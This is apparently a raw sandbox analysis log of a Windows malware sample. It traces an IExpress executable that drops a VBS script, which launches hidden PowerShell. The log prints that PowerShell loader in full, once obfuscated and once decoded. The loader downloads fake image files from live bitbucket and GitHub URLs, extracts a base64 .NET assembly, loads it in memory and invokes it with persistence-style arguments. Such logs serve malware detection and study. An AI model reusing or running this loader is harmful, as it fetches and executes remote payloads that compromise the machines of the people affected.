        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeFile created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMPJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 675c87f6bfee1.vbs
        Source: GdGXG0bnxH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: GdGXG0bnxH.exeReversingLabs: Detection: 39%
        Source: unknownProcess created: C:\Users\user\Desktop\GdGXG0bnxH.exe "C:\Users\user\Desktop\GdGXG0bnxH.exe"
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 675c87f6bfee1.vbs
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 675c87f6bfee1.vbsJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: feclient.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeSection loaded: advpack.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
